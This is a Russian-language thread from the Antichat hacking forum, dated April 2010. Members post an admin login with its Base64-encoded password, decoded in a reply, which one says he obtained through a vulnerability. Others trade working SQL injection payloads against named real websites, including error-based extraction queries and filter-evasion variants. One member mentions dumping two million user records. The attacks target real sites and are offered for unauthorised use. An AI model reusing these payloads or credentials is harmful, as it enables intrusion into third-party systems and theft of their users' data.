Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.04.2010, 18:51
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Translate!!!!!
Всем приятного времени сутак )
Сразу к делу ..
Черес уязвимост получил логин и парол админа но когда пробую заити как админ говарит што парол/логин непатходит...
Вот сам сайт :ww_w.zhengazeta.by/magia_gadania/category/89
Login: admin
Pw : eXoyMDA4
Настораживает присутствие в сочетание пароля (MDA)... возможна ветом проблема ?
Вопчем уже не первый раз такое , посоветуйте как распознавать разные типы паролей если они зашифрованы ... или что именно не пускает зайти
Силна не пинайте .. спс
|
|
|
18.04.2010, 19:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Login: admin
Pw : eXoyMDA4
Пароль в BASE64, "yz2008"
|
|
|
|
18.04.2010, 19:57
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Как здесь можно обойти фильтрацию?
http://www.vino-concept.ch/content.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10+frfromom+info rmation_schema.tables+--+
|
|
|
|
18.04.2010, 20:11
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 14
Провел на форуме:
31928
Репутация:
1
|
|
http://***/view.php?abc=1version()&def=ghi
FUNCTION ttt.1version does not exist
view.php?abc=1version0&def=ghi
Unknown column '1version0' in 'where clause'
что делать?)
единицу нельзя убрать в переди)
|
|
|
|
18.04.2010, 20:51
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Translate !!!!!
Спс Pashkela , Вопчем пропустить через все кодировки ?
|
|
|
|
18.04.2010, 21:19
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Hk4q5
http://***/view.php?abc=1version()&def=ghi
FUNCTION ttt.1version does not exist
view.php?abc=1version0&def=ghi
Unknown column '1version0' in 'where clause'
что делать?)
единицу нельзя убрать в переди)
1/**/version0&def=ghi так идет?
|
|
|
|
18.04.2010, 21:47
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 14
Провел на форуме:
31928
Репутация:
1
|
|
Сообщение от [Feldmarschall]
1/**/version0&def=ghi так идет?
нет так тоже пробовал.
делаю запрос
Код:
http://xxx/xxx.php?abc=1%version()&def=ghi
получаю в исходном коде :
Код:
<input type="hidden" name="id" value="1%version()">
Код:
1/**/OR/*d*/user=root
Unknown column 'user' in 'where clause'
Код:
1/**/OR/*d*/author=id
<input type="hidden" name="id" value="1/**/OR/*d*/author=id">
не пойму 
P.S урл дать не могу сайт почти копия milw0rm.com
:P
всем спасибо сам разобрался:
+and(select%201%20from(select%20count(*),concat(us er(),floor(rand(0)*2))x%20from%20information_schem a.tables%20group%20by%20x)a)--&
Последний раз редактировалось Hk4q5; 18.04.2010 в 22:31..
|
|
|
|
19.04.2010, 08:52
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от Pashkela
Код:
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+version()),floor(rand(0)*2))+From+menus+Group+By+2)a)
а дальше как ??
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+/*!table_name*/),floor(rand(0)*2))+From+/*!information_schema.tables*/+Group+By+2)a)
не получается..
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+Table_na me),floor(rand(0)*2))+From+Information_Schema.Tabl es+Group+By+2)a)
и так не получается..
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+tAbLe_Na mE),floor(rand(0)*2))+From+iNfOrMation_SchemA.tAbl Es+Group+By+2)a)
и так..
|
|
|
|
19.04.2010, 09:58
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+table_Na me+from+information_schema.tables+limit+24,1),floo r(rand(0)*2))+From+menus+Group+By+2)a)
[-_-]
|
|
|
|
19.04.2010, 14:28
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Feldmarschall, что 4 ветка я знаю, даже знаю имя таблицы где лежат данные юзеров.
тянуть 2 ляма юзеров слепым это жесть
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
